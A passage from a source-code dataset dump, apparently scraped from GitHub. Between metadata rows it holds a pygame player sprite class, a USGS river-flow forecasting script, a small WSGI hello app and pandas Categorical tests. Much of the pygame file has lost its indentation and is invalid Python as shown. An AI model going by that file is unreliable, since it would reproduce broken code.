        U = input("\nWANT TO TRY AGAIN? PLEASE TYPE -- [YES/Y OR NO/N] :--\t").lower()
        if U not in ('yes', 'y'):
            print("\n\n~THANK YOU! ")
            break
temp()
# CODED BY TSG405, 2021
| [
"noreply@github.com"
] | TSG405.noreply@github.com |
044453674225f4f7f80b35df6406430f80efa084 | cdf99a1d50ef2eae92736aa387e8c9766784d717 | /src/player.py | c818172979b4e3b825ed4f346703395370eaa7aa | [] | no_license | JoseLooLo/Defeat-the-Night | aea81a0d39daa88f57091584389abb776d87c128 | 61262b18dbd72479a16d5702a9875a627910bd81 | refs/heads/master | 2020-05-17T21:34:12.866871 | 2019-06-22T17:29:43 | 2019-06-22T17:29:43 | 183,975,305 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,178 | py | import os, sys
import pygame
import time
from src.colision import Colision
from src.weapon import Weapon
class Player(pygame.sprite.Sprite):
    def __init__(self, settings, camera, playerID):
        """Create a player sprite bound to `settings`/`camera`, with weapon ID 0 equipped."""
        pygame.sprite.Sprite.__init__(self)
        self.settings = settings
        self.playerID = playerID
        self.camera = camera
        self.weaponAtual = Weapon(self.settings, self, 0)
        self.__init()
    def __init(self):
        # Two-phase setup: plain attributes first, then the image surfaces.
        self.__loadVariables()
        self.__loadImages()
    def __loadVariables(self):
        """Initialise all per-player state from the settings for this player ID."""
        # Frame-animation control variables
        self.qntImagePlayerWalk = self.settings.getPlayerQntImagesWalk(self.playerID)
        self.qntImagePlayerStop = self.settings.getPlayerQntImagesStop(self.playerID)
        self.qntImagePlayerAttack = self.settings.getPlayerQntImagesAttack(self.playerID)
        self.qntImagePlayerJump = self.settings.getPlayerQntImagesJump(self.playerID)
        self.numCurrentImagePlayer = 0
        self.velocityImagePlayer = self.settings.getPlayerVelocityImages(self.playerID)
        self.velocityImagePlayerAttack = self.settings.getPlayerVelocityImagesAttack(self.playerID)
        # Player stats
        self.playerDamage = self.settings.getPlayerStatusDamage(self.playerID)
        self.playerVelocity = self.settings.getPlayerStatusVelocity(self.playerID)
        self.playerLife = self.settings.getPlayerStatusLife(self.playerID)
        self.playerMoney = self.settings.getPlayerStatusMoney(self.playerID)
        self.playerImunityTime = self.settings.getPlayerStatusImunityTime(self.playerID)
        self.countImunityTime = 0
        # Jump
        self.playerVelocityJump = self.settings.getPlayerStatusVelocityJump(self.playerID)
        self.playerHeightJump = self.settings.getPlayerStatusHeightJump(self.playerID)
        self.playerStatusDefaultJumpTime = self.settings.playerStatusDefaultJumpTime
        self.countInJumpUp = self.playerHeightJump # counter for the ascending part of the jump
        self.countInJumpDown = 0 # counter for the descending part of the jump
        self.countJumpPlayer = 0
        self.countAirJumpPlayer = 0
        # State flags
        self.inMoving = False
        self.inJump = False
        self.inAirJump = False
        self.inDamage = False # True while inside the post-hit invulnerability window
        self.inAtack = False
        self.colisionRight = False
        self.colisionLeft = False
        self.posXMouseInScreenIsRightSide = False
        self.startMoviment = False
        # Animation timing
        self.startChangeImage = time.time()
        self.endChangeImage = time.time()
def __loadImages(self):
self.__imagePlayerWalk = []
for i in range(self.qntImagePlayerWalk):
tempImage = self.settings.load_Images("walking"+str(i)+".png", "Player/ID"+str(self.playerID), -1)
self.__imagePlayerWalk.append(tempImage)
self.__imagePlayerStop = []
for i in range(self.qntImagePlayerStop):
tempImage = self.settings.load_Images("stopped"+str(i)+".png", "Player/ID"+str(self.playerID), -1)
self.__imagePlayerStop.append(tempImage)
self.__imagePlayerAttack = []
for i in range(self.qntImagePlayerAttack):
tempImage = self.settings.load_Images("attack"+str(i)+".png", "Player/ID"+str(self.playerID), -1)
self.__imagePlayerAttack.append(tempImage)
self.__imagePlayerJump = []
for i in range(self.qntImagePlayerJump):
tempImage = self.settings.load_Images("jump"+str(i)+".png", "Player/ID"+str(self.playerID), -1)
self.__imagePlayerJump.append(tempImage)
self.__currentImagePlayer = self.__imagePlayerStop[0]
self.__rectPlayer = self.__currentImagePlayer.get_rect()
self.__rectPlayer.y += self.camera.getPosYplayer()
#-----------------------------------
#Jump
def __setImagePlayerJump(self, numImg):
self.__currentImagePlayer = self.__imagePlayerJump[numImg]
self.numCurrentImagePlayer = numImg
self.__flipImage()
def __setProxImagePlayerJump(self):
if self.numCurrentImagePlayer == self.qntImagePlayerJump -1:
pass
#self.numCurrentImagePlayer = 0
#self.__setImagePlayerJump(0)
else:
self.__setImagePlayerJump(self.numCurrentImagePlayer + 1)
#-----------------------------------
#-----------------------------------
#Walk
def __setImagePlayerWalk(self, numImg):
self.__currentImagePlayer = self.__imagePlayerWalk[numImg]
self.numCurrentImagePlayer = numImg
self.__flipImage()
def __setProxImagePlayerMoving(self):
if self.inMoving:
if self.numCurrentImagePlayer == self.qntImagePlayerWalk -1:
self.__setImagePlayerWalk(0)
else:
self.__setImagePlayerWalk(self.numCurrentImagePlayer + 1)
else:
self.startMoviment = False
if self.numCurrentImagePlayer == self.qntImagePlayerStop -1:
self.__setImagePlayerStop(0)
else:
self.__setImagePlayerStop(self.numCurrentImagePlayer + 1)
#-----------------------------------
#-----------------------------------
#Stop
def __setImagePlayerStop(self, numImg):
self.__currentImagePlayer = self.__imagePlayerStop[numImg]
self.numCurrentImagePlayer = numImg
self.__flipImage()
#-----------------------------------
#-----------------------------------
#Attack
def __setImagePlayerAttack(self, numImg):
self.__currentImagePlayer = self.__imagePlayerAttack[numImg]
self.numCurrentImagePlayer = numImg
self.weaponAtual.setCurrentImage(self.numCurrentImagePlayer)
self.weaponAtual.resetFlipDis()
self.__flipImage()
def __setProxImagePlayerAttack(self):
if self.numCurrentImagePlayer == self.qntImagePlayerAttack -1:
self.inAtack = False
self.numCurrentImagePlayer = 0
#self.__setImagePlayerAttack(0)
else:
self.__setImagePlayerAttack(self.numCurrentImagePlayer + 1)
#-----------------------------------
    def __setProxImagePlayer(self):
        # Exactly one animation state machine runs per tick: attack has priority
        # over jump, which has priority over walk/idle.
        if self.inAtack:
            self.__setProxImagePlayerAttack()
        elif self.inJump:
            self.__setProxImagePlayerJump()
        else:
            self.__setProxImagePlayerMoving()
def setInMoving(self, inMoving):
self.inMoving = inMoving
if not inMoving and not self.inAtack:
self.resetCurrentImagePlayer()
self.inMoving = inMoving
def setInJump(self, inJump):
if self.inAtack:
return
self.inJump = inJump
self.resetCurrentImagePlayer()
    def resetCurrentImagePlayer(self):
        # Restart the current animation from its first frame.
        self.numCurrentImagePlayer = 0
    def resetCurrentImagePlayerAfterJump(self):
        # Resume the animation from frame 1 after a jump (skips frame 0;
        # the reason is not evident from this file — confirm with callers).
        self.numCurrentImagePlayer = 1
def getPlayerPosX(self):
return self.camera.getPosXplayer() + self.settings.screen_width/2
    def update(self):
        """Per-frame tick: mouse facing, animation, horizontal movement, jump physics, timers."""
        self.__updateMousePosition()
        self.__updateImages()
        self.__updateStep()
        self.__updateJump()
        self.__updateCounters()
    def __updateCounters(self):
        # Tick the post-hit invulnerability timer only while it is active.
        if self.inDamage:
            self.countImunityTime+=1
def __updateImages(self):
tempVelocity = self.velocityImagePlayer
if self.inAtack:
tempVelocity = self.velocityImagePlayerAttack
self.endChangeImage = time.time()
if self.endChangeImage - self.startChangeImage >= tempVelocity:
self.startChangeImage = time.time()
self.__setProxImagePlayer()
def __updateStep(self):
if (self.numCurrentImagePlayer >= 1 or self.startMoviment) and self.inMoving:
self.startMoviment = True
self.__step()
def __step(self):
if not self.__verificaExtremos() and self.inMoving:
if self.playerVelocity < 0 and not self.colisionLeft: #Verifica se o jogador está se movendo para a esquerda e se não está colidindo pela esquerda
self.camera.addPlayerPosX(self.playerVelocity) #Altera a posição do jogador (Na real altera a posição posX que é do background, o personagem é fixo no meio do background)
elif self.playerVelocity > 0 and not self.colisionRight:
self.camera.addPlayerPosX(self.playerVelocity)
def __verificaExtremos(self):
if self.camera.getPosXplayer() + self.playerVelocity < self.settings.screen_width/2:
return True
if self.camera.getPosXplayer() + self.playerVelocity > self.camera.getBackgroundImageW() - self.settings.screen_width - self.__rectPlayer.w/2:
return True
return False
    def __updateJump(self):
        # Run jump physics only while airborne.
        if self.inJump:
            self.__jump()
    def __jump(self):
        """Advance one jump-physics step: ascend while `countInJumpUp` lasts, then descend.

        Note: rect `y` grows during ascent and shrinks during descent here;
        `draw` subtracts it from the baseline, so a larger `y` is drawn higher.
        """
        if self.countInJumpUp - self.playerStatusDefaultJumpTime > 0:
            # Ascending: transfer height from the up-counter to the down-counter.
            self.countInJumpUp -= self.playerStatusDefaultJumpTime
            self.countInJumpDown += self.playerStatusDefaultJumpTime
            self.__rectPlayer.y += self.playerStatusDefaultJumpTime
        else:
            if self.countInJumpDown == 0:
                # Landed: leave the jump state and reset the counters for next time.
                self.inJump = False
                self.resetCurrentImagePlayer()
                self.countInJumpUp = self.playerHeightJump
                self.countInJumpDown = 0
            else:
                # Descending: unwind the accumulated height.
                self.countInJumpDown -= self.playerStatusDefaultJumpTime
                self.__rectPlayer.y -= self.playerStatusDefaultJumpTime
def __updateMousePosition(self):
#Muda a variavel de controle para verificar a posição do mouse na tela
metadeTelaX = int(self.settings.screen_width/2)
#pygame.mouse.get_pos()[0] pega a posição X do cursor do mouse atual
if pygame.mouse.get_pos()[0] > metadeTelaX:
self.posXMouseInScreenIsRightSide = True
else:
self.posXMouseInScreenIsRightSide = False
def __flipImage(self):
if not self.posXMouseInScreenIsRightSide:
tempColorKey = self.__currentImagePlayer.get_colorkey()
tempImage = pygame.transform.flip(self.__currentImagePlayer, True, False)
tempImage.set_colorkey(tempColorKey)
self.__currentImagePlayer = tempImage
tempY = self.__rectPlayer.y
self.__rectPlayer = self.__currentImagePlayer.get_rect()
self.__rectPlayer.y = tempY
self.weaponAtual.flipImage()
def resetVariables(self):
self.__loadVariables()
def draw(self, camera):
camera.drawScreenFix(self.__currentImagePlayer, (self.settings.screen_width/2, self.settings.valuePosY-self.__rectPlayer.h-self.__rectPlayer.y))
if self.inAtack:
camera.drawScreenFix(self.weaponAtual.getCurrentImage(), (self.settings.screen_width/2+self.weaponAtual.flipDis, self.settings.valuePosY-self.__rectPlayer.h-self.__rectPlayer.y-8))
def getRectPlayer(self):
tempRect = self.__rectPlayer.copy()
tempRect.x = self.getPlayerPosX()
return tempRect
def getWeapon(self):
return self.weaponAtual
def removeColision(self):
self.colisionLeft = False
self.colisionRight = False
def setDamage(self, damage):
if self.inDamage: #Se já levou dano e está no tempo de invunerabilidade
#A variabel contador de imunidade é incrementada no update de contadores
if self.countImunityTime >= self.playerImunityTime:
self.inDamage = False
self.countImunityTime = 0
else:
self.inDamage = True
self.countImunityTime = 0
if self.playerLife - damage <= 0:
self.playerLife = 0
else:
self.playerLife -= damage
if self.settings.generalInfo:
print ("Damage %d | Life %d" % (damage, self.playerLife))
def attack(self):
if self.inJump or self.inAtack:
return
self.inAtack = True
self.numCurrentImagePlayer = 0
def getMoneyFromChat(self, value):
self.playerMoney += value
print ("Get money %d (from chat)" % (value))
def getWeaponDamageFromChat(self, value):
self.playerDamage += value
print ("Get weapon damage %d (from chat)" % (value))
def getHPFromChat(self, value):
self.playerLife += value
print ("Get HP %d (from chat)" % (value))
def setHPFromChat(self, value):
self.playerLife = value
print ("Set HP %d (from chat)" % (value))
def getVelocityFromChat(self, value):
self.playerVelocity += value
print ("Get Velocity %d (from chat)" % (value)) | [
"joseloolo@hotmail.com"
] | joseloolo@hotmail.com |
5fdb4b233dd4fdfcfd42200e296d2938286f979a | f3c27ed7c4e2b9f4df497f7371cfd585d3b0bba4 | /Submissions/team_forecast/Bits and Pieces/Step10.py | 74e41bdb80def8d4b3182b5cb0f5c6cea284df5d | [] | no_license | genoonan/homework-genoonan | f69c7e0a6bd744d8d960fdf7c689b0afa9af09a8 | a4bd1e5ab73d2185668a6d2c333cd64c4a487b97 | refs/heads/master | 2023-01-27T22:07:37.471752 | 2020-12-08T12:41:05 | 2020-12-08T12:41:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,559 | py | # %%
# Import the modules we will use
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression
import datetime
import urllib.request as req
import urllib
import scipy
# %%
def weekly_min1(month1, day_more, day_less):
'''Function (weekly_min1):
This function is for time windows within the same month.
It pulls values out of the data_week_min dataframe which
is aggregated by weekly minimum value. The historical minimums are
plotted over the data time period. It then pulls the
minimum historical value from the weekly minimum values
for the given month, day time period. It removes 2020 data so that
the historical forecast only uses data prior to the forecast period.
Parameters
----------
month1: int
Input variable with one value representing
first month of the time window
day_more: int
Input variable with one value representing
first day of the time window
day_less: int
Input variable with one value representing
last day of the time window
Returns
------
wk_min : dataframe
Outputs a dataframe with only data for specified time period
and prints the output minimum flow value
'''
wk_min = data_week_min[(data_week_min.index.month == month1)
& (data_week_min.index.day >= day_more)
& (data_week_min.index.day <= day_less)
& (data_week_min.index.year != 2020)]
print("")
print("Plotted historical weekly minimum flows for ", month1, "-",
day_more, "to", month1, "-", day_less)
wk_min.reset_index().plot(x="datetime",
y="flow",
title="Historical Flow Weekly Minimums",
kind="scatter")
plt.show()
print("The overall historical weekly minimum flow for ",
month1, "-", day_more, "to", month1, "-", day_less,
" is", wk_min.flow.min(), "cfs")
seasonal_list.append(wk_min.flow.min())
def weekly_min2(month1, day1, month2, day2):
'''Function (weekly_min2):
This function is for time windows spanning two months.
It pulls values out of the data_week_min dataframe which
is aggregated by weekly minimum value. The historical minimums are
plotted over the data time period. It then pulls the
minimum historical value from the weekly minimum values
for the given month, day time period. It removes 2020 data so that
the historical forecast only uses data prior to the forecast period.
Parameters
----------
month1: int
Input variable with one value representing
first month of the time window
day1: int
Input variable with one value representing
first day of the time window
month2: int
Input variable with one value representing
second month of the time window
day2: int
Input variable with one value representing
last day of the time window
Returns
------
wk_min : dataframe
Outputs a dataframe with only data for specified time period
and prints the output minimum flow value'''
wk_min = data_week_min[((data_week_min.index.month == month1)
& (data_week_min.index.day >= day1)
| (data_week_min.index.month == month2)
& (data_week_min.index.day <= day2))
& (data_week_min.index.year != 2020)]
print("")
print("Plotted historical weekly minimum flows for ", month1, "-", day1,
"to", month2, "-", day2)
wk_min.reset_index().plot(x="datetime",
y="flow",
title="Historical Flow Weekly Minimums",
kind="scatter")
plt.show()
print("The overall historical weekly minimum flow for ", month1, "-", day1,
"to", month2, "-", day2, " is",
wk_min.flow.min(), "cfs")
seasonal_list.append(wk_min.flow.min())
# %%
# Step 1: Import USGS flow data
# Replace parts of url with variables
site = '09506000'
start = '1989-01-01'
end = '2020-10-31' # Update end date each week to Saturday
url = "https://waterdata.usgs.gov/nwis/dv?cb_00060=on&format=rdb&site_no=" + \
site + "&referred_module=sw&period=&begin_date=" + start + "&end_date=" + \
end
data = pd.read_table(url, skiprows=30, names=['agency_cd', 'site_no',
'datetime', 'flow', 'code'],
parse_dates=['datetime'])
# Expand the dates to year month day
data['year'] = pd.DatetimeIndex(data['datetime']).year
data['month'] = pd.DatetimeIndex(data['datetime']).month
data['day'] = pd.DatetimeIndex(data['datetime']).day
data['dayofweek'] = pd.DatetimeIndex(data['datetime']).dayofweek
# %%
# Step 10: # Generate long term forecast based on historical minimums
# First aggregate flow values to weekly MINIMUM
data_week_min = data.resample("W-SAT", on='datetime').min()
# Reset index to be first day of week instead of last
data_week_min = data_week_min.set_index("datetime")
# %%
# Plot historical weekly flows for each forecast week
# Use functions 'weekly_min1' or 'weekly_min2' to grab historical minimum flow
# %%
# Set empty list
seasonal_list = list()
# Wk1 historical min (8/22 - 8/29)
month1 = 8
day_more = 22
day_less = 29
weekly_min1(month1, day_more, day_less)
# Wk2 historical min (8/30 - 9/5)(spans two months so does not use function)
month1 = 8
day1 = 30
month2 = 9
day2 = 5
weekly_min2(month1, day1, month2, day2)
# Wk3 historical min (9/6 - 9/12)
month1 = 9
day_more = 6
day_less = 12
weekly_min1(month1, day_more, day_less)
# Wk4 historical min (9/13 - 9/19)
month1 = 9
day_more = 13
day_less = 19
weekly_min1(month1, day_more, day_less)
# Wk5 historical min (9/20 - 9/26)
month1 = 9
day_more = 20
day_less = 26
weekly_min1(month1, day_more, day_less)
# Wk6 historical min (9/27 - 10/3) (spans two months so does not use function)
month1 = 9
day1 = 27
month2 = 10
day2 = 3
weekly_min2(month1, day1, month2, day2)
# Wk7 historical min (10/4 - 10/10)
month1 = 10
day_more = 4
day_less = 10
weekly_min1(month1, day_more, day_less)
# Wk8 historical min (10/11 - 10/17)
month1 = 10
day_more = 11
day_less = 17
weekly_min1(month1, day_more, day_less)
# Wk9 historical min (10/18 - 10/24)
month1 = 10
day_more = 18
day_less = 24
weekly_min1(month1, day_more, day_less)
# Wk10 historical min (10/25 - 10/31)
month1 = 10
day_more = 25
day_less = 31
weekly_min1(month1, day_more, day_less)
# Wk11 historical min (11/1 - 11/7)
month1 = 11
day_more = 1
day_less = 7
weekly_min1(month1, day_more, day_less)
# Wk12 historical min (11/8 - 11/14)
month1 = 11
day_more = 8
day_less = 14
weekly_min1(month1, day_more, day_less)
# Wk13 historical min (11/15 - 11/21)
month1 = 11
day_more = 15
day_less = 21
weekly_min1(month1, day_more, day_less)
# Wk14 historical min (11/22 - 11/28)
month1 = 11
day_more = 22
day_less = 28
weekly_min1(month1, day_more, day_less)
# Wk15 historical min (11/29 - 12/5)(spans two months so does not use function)
month1 = 11
day1 = 29
month2 = 12
day2 = 5
weekly_min2(month1, day1, month2, day2)
# Wk16 historical min (12/6 - 12/12)
month1 = 12
day_more = 6
day_less = 12
weekly_min1(month1, day_more, day_less)
# %%
print("Seasonal forecast list =", seasonal_list)
# %%
| [
"gillianerin@gmail.com"
] | gillianerin@gmail.com |
9164ce0de0c4b054d9f1697160fdb022c4602817 | d68554f9194e949020c62af92ad94c1ce137a29a | /web/hello.py | 8bde944011b0e44cf89e50e69b61b8689799137a | [] | no_license | 7colorlotus/pythonLearn | f60c9cbc0be0a42f3676f59cbdabe1e7947c8527 | e4e6a0d1ad3d389002cb96b8367618b32d5be4e8 | refs/heads/master | 2020-05-22T06:57:39.084279 | 2019-07-19T07:11:08 | 2019-07-19T07:11:08 | 64,715,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py | #hello.py
def application(environ,start_response):
start_response('200 OK',[('Content-Type','text/html')])
body = '<h1>Hello,%s!</h1>' % (environ['PATH_INFO'][1:] or 'web')
return [body.encode('utf-8')]
| [
"626477293@qq.com"
] | 626477293@qq.com |
d5d74faabbe533b0b669c36f2c141f32fc8b63aa | 209a7a4023a9a79693ec1f6e8045646496d1ea71 | /COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/pandas/tests/arrays/categorical/test_analytics.py | 6aa36525fd6980d29cb1249c01c9b0434bf179be | [
"MIT"
] | permissive | anzhao920/MicrosoftProject15_Invictus | 5e2347015411bbffbdf0ceb059df854661fb240c | 15f44eebb09561acbbe7b6730dfadf141e4c166d | refs/heads/main | 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 | MIT | 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null | UTF-8 | Python | false | false | 14,794 | py | import re
import sys
import numpy as np
import pytest
from pandas.compat import PYPY
from pandas import Categorical, Index, NaT, Series, date_range
import pandas._testing as tm
from pandas.api.types import is_scalar
class TestCategoricalAnalytics:
@pytest.mark.parametrize("aggregation", ["min", "max"])
def test_min_max_not_ordered_raises(self, aggregation):
# unordered cats have no min/max
cat = Categorical(["a", "b", "c", "d"], ordered=False)
msg = f"Categorical is not ordered for operation {aggregation}"
agg_func = getattr(cat, aggregation)
with pytest.raises(TypeError, match=msg):
agg_func()
def test_min_max_ordered(self):
cat = Categorical(["a", "b", "c", "d"], ordered=True)
_min = cat.min()
_max = cat.max()
assert _min == "a"
assert _max == "d"
cat = Categorical(
["a", "b", "c", "d"], categories=["d", "c", "b", "a"], ordered=True
)
_min = cat.min()
_max = cat.max()
assert _min == "d"
assert _max == "a"
@pytest.mark.parametrize(
"categories,expected",
[
(list("ABC"), np.NaN),
([1, 2, 3], np.NaN),
pytest.param(
Series(date_range("2020-01-01", periods=3), dtype="category"),
NaT,
marks=pytest.mark.xfail(
reason="https://github.com/pandas-dev/pandas/issues/29962"
),
),
],
)
@pytest.mark.parametrize("aggregation", ["min", "max"])
def test_min_max_ordered_empty(self, categories, expected, aggregation):
# GH 30227
cat = Categorical([], categories=categories, ordered=True)
agg_func = getattr(cat, aggregation)
result = agg_func()
assert result is expected
@pytest.mark.parametrize(
"values, categories",
[(["a", "b", "c", np.nan], list("cba")), ([1, 2, 3, np.nan], [3, 2, 1])],
)
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("function", ["min", "max"])
def test_min_max_with_nan(self, values, categories, function, skipna):
# GH 25303
cat = Categorical(values, categories=categories, ordered=True)
result = getattr(cat, function)(skipna=skipna)
if skipna is False:
assert result is np.nan
else:
expected = categories[0] if function == "min" else categories[2]
assert result == expected
@pytest.mark.parametrize("function", ["min", "max"])
@pytest.mark.parametrize("skipna", [True, False])
def test_min_max_only_nan(self, function, skipna):
# https://github.com/pandas-dev/pandas/issues/33450
cat = Categorical([np.nan], categories=[1, 2], ordered=True)
result = getattr(cat, function)(skipna=skipna)
assert result is np.nan
@pytest.mark.parametrize("method", ["min", "max"])
def test_deprecate_numeric_only_min_max(self, method):
# GH 25303
cat = Categorical(
[np.nan, 1, 2, np.nan], categories=[5, 4, 3, 2, 1], ordered=True
)
with tm.assert_produces_warning(expected_warning=FutureWarning):
getattr(cat, method)(numeric_only=True)
@pytest.mark.parametrize("method", ["min", "max"])
def test_numpy_min_max_raises(self, method):
cat = Categorical(["a", "b", "c", "b"], ordered=False)
msg = (
f"Categorical is not ordered for operation {method}\n"
"you can use .as_ordered() to change the Categorical to an ordered one"
)
method = getattr(np, method)
with pytest.raises(TypeError, match=re.escape(msg)):
method(cat)
@pytest.mark.parametrize("kwarg", ["axis", "out", "keepdims"])
@pytest.mark.parametrize("method", ["min", "max"])
def test_numpy_min_max_unsupported_kwargs_raises(self, method, kwarg):
cat = Categorical(["a", "b", "c", "b"], ordered=True)
msg = (
f"the '{kwarg}' parameter is not supported in the pandas implementation "
f"of {method}"
)
if kwarg == "axis":
msg = r"`axis` must be fewer than the number of dimensions \(1\)"
kwargs = {kwarg: 42}
method = getattr(np, method)
with pytest.raises(ValueError, match=msg):
method(cat, **kwargs)
@pytest.mark.parametrize("method, expected", [("min", "a"), ("max", "c")])
def test_numpy_min_max_axis_equals_none(self, method, expected):
cat = Categorical(["a", "b", "c", "b"], ordered=True)
method = getattr(np, method)
result = method(cat, axis=None)
assert result == expected
@pytest.mark.parametrize(
"values,categories,exp_mode",
[
([1, 1, 2, 4, 5, 5, 5], [5, 4, 3, 2, 1], [5]),
([1, 1, 1, 4, 5, 5, 5], [5, 4, 3, 2, 1], [5, 1]),
([1, 2, 3, 4, 5], [5, 4, 3, 2, 1], [5, 4, 3, 2, 1]),
([np.nan, np.nan, np.nan, 4, 5], [5, 4, 3, 2, 1], [5, 4]),
([np.nan, np.nan, np.nan, 4, 5, 4], [5, 4, 3, 2, 1], [4]),
([np.nan, np.nan, 4, 5, 4], [5, 4, 3, 2, 1], [4]),
],
)
def test_mode(self, values, categories, exp_mode):
s = Categorical(values, categories=categories, ordered=True)
res = s.mode()
exp = Categorical(exp_mode, categories=categories, ordered=True)
tm.assert_categorical_equal(res, exp)
def test_searchsorted(self, ordered):
# https://github.com/pandas-dev/pandas/issues/8420
# https://github.com/pandas-dev/pandas/issues/14522
cat = Categorical(
["cheese", "milk", "apple", "bread", "bread"],
categories=["cheese", "milk", "apple", "bread"],
ordered=ordered,
)
ser = Series(cat)
# Searching for single item argument, side='left' (default)
res_cat = cat.searchsorted("apple")
assert res_cat == 2
assert is_scalar(res_cat)
res_ser = ser.searchsorted("apple")
assert res_ser == 2
assert is_scalar(res_ser)
# Searching for single item array, side='left' (default)
res_cat = cat.searchsorted(["bread"])
res_ser = ser.searchsorted(["bread"])
exp = np.array([3], dtype=np.intp)
tm.assert_numpy_array_equal(res_cat, exp)
tm.assert_numpy_array_equal(res_ser, exp)
# Searching for several items array, side='right'
res_cat = cat.searchsorted(["apple", "bread"], side="right")
res_ser = ser.searchsorted(["apple", "bread"], side="right")
exp = np.array([3, 5], dtype=np.intp)
tm.assert_numpy_array_equal(res_cat, exp)
tm.assert_numpy_array_equal(res_ser, exp)
# Searching for a single value that is not from the Categorical
with pytest.raises(KeyError, match="cucumber"):
cat.searchsorted("cucumber")
with pytest.raises(KeyError, match="cucumber"):
ser.searchsorted("cucumber")
# Searching for multiple values one of each is not from the Categorical
with pytest.raises(KeyError, match="cucumber"):
cat.searchsorted(["bread", "cucumber"])
with pytest.raises(KeyError, match="cucumber"):
ser.searchsorted(["bread", "cucumber"])
def test_unique(self):
# categories are reordered based on value when ordered=False
cat = Categorical(["a", "b"])
exp = Index(["a", "b"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
tm.assert_categorical_equal(res, cat)
cat = Categorical(["a", "b", "a", "a"], categories=["a", "b", "c"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
tm.assert_categorical_equal(res, Categorical(exp))
cat = Categorical(["c", "a", "b", "a", "a"], categories=["a", "b", "c"])
exp = Index(["c", "a", "b"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
exp_cat = Categorical(exp, categories=["c", "a", "b"])
tm.assert_categorical_equal(res, exp_cat)
# nan must be removed
cat = Categorical(["b", np.nan, "b", np.nan, "a"], categories=["a", "b", "c"])
res = cat.unique()
exp = Index(["b", "a"])
tm.assert_index_equal(res.categories, exp)
exp_cat = Categorical(["b", np.nan, "a"], categories=["b", "a"])
tm.assert_categorical_equal(res, exp_cat)
def test_unique_ordered(self):
# keep categories order when ordered=True
cat = Categorical(["b", "a", "b"], categories=["a", "b"], ordered=True)
res = cat.unique()
exp_cat = Categorical(["b", "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(
["c", "b", "a", "a"], categories=["a", "b", "c"], ordered=True
)
res = cat.unique()
exp_cat = Categorical(["c", "b", "a"], categories=["a", "b", "c"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(["b", "a", "a"], categories=["a", "b", "c"], ordered=True)
res = cat.unique()
exp_cat = Categorical(["b", "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(
["b", "b", np.nan, "a"], categories=["a", "b", "c"], ordered=True
)
res = cat.unique()
exp_cat = Categorical(["b", np.nan, "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
def test_unique_index_series(self):
c = Categorical([3, 1, 2, 2, 1], categories=[3, 2, 1])
# Categorical.unique sorts categories by appearance order
# if ordered=False
exp = Categorical([3, 1, 2], categories=[3, 1, 2])
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
c = Categorical([1, 1, 2, 2], categories=[3, 2, 1])
exp = Categorical([1, 2], categories=[1, 2])
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
c = Categorical([3, 1, 2, 2, 1], categories=[3, 2, 1], ordered=True)
# Categorical.unique keeps categories order if ordered=True
exp = Categorical([3, 1, 2], categories=[3, 2, 1], ordered=True)
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
def test_shift(self):
# GH 9416
cat = Categorical(["a", "b", "c", "d", "a"])
# shift forward
sp1 = cat.shift(1)
xp1 = Categorical([np.nan, "a", "b", "c", "d"])
tm.assert_categorical_equal(sp1, xp1)
tm.assert_categorical_equal(cat[:-1], sp1[1:])
# shift back
sn2 = cat.shift(-2)
xp2 = Categorical(
["c", "d", "a", np.nan, np.nan], categories=["a", "b", "c", "d"]
)
tm.assert_categorical_equal(sn2, xp2)
tm.assert_categorical_equal(cat[2:], sn2[:-2])
# shift by zero
tm.assert_categorical_equal(cat, cat.shift(0))
def test_nbytes(self):
cat = Categorical([1, 2, 3])
exp = 3 + 3 * 8 # 3 int8s for values + 3 int64s for categories
assert cat.nbytes == exp
def test_memory_usage(self):
cat = Categorical([1, 2, 3])
# .categories is an index, so we include the hashtable
assert 0 < cat.nbytes <= cat.memory_usage()
assert 0 < cat.nbytes <= cat.memory_usage(deep=True)
cat = Categorical(["foo", "foo", "bar"])
assert cat.memory_usage(deep=True) > cat.nbytes
if not PYPY:
# sys.getsizeof will call the .memory_usage with
# deep=True, and add on some GC overhead
diff = cat.memory_usage(deep=True) - sys.getsizeof(cat)
assert abs(diff) < 100
def test_map(self):
c = Categorical(list("ABABC"), categories=list("CBA"), ordered=True)
result = c.map(lambda x: x.lower())
exp = Categorical(list("ababc"), categories=list("cba"), ordered=True)
tm.assert_categorical_equal(result, exp)
c = Categorical(list("ABABC"), categories=list("ABC"), ordered=False)
result = c.map(lambda x: x.lower())
exp = Categorical(list("ababc"), categories=list("abc"), ordered=False)
tm.assert_categorical_equal(result, exp)
result = c.map(lambda x: 1)
# GH 12766: Return an index not an array
tm.assert_index_equal(result, Index(np.array([1] * 5, dtype=np.int64)))
@pytest.mark.parametrize("value", [1, "True", [1, 2, 3], 5.0])
def test_validate_inplace_raises(self, value):
cat = Categorical(["A", "B", "B", "C", "A"])
msg = (
'For argument "inplace" expected type bool, '
f"received type {type(value).__name__}"
)
with pytest.raises(ValueError, match=msg):
cat.set_ordered(value=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.as_ordered(inplace=value)
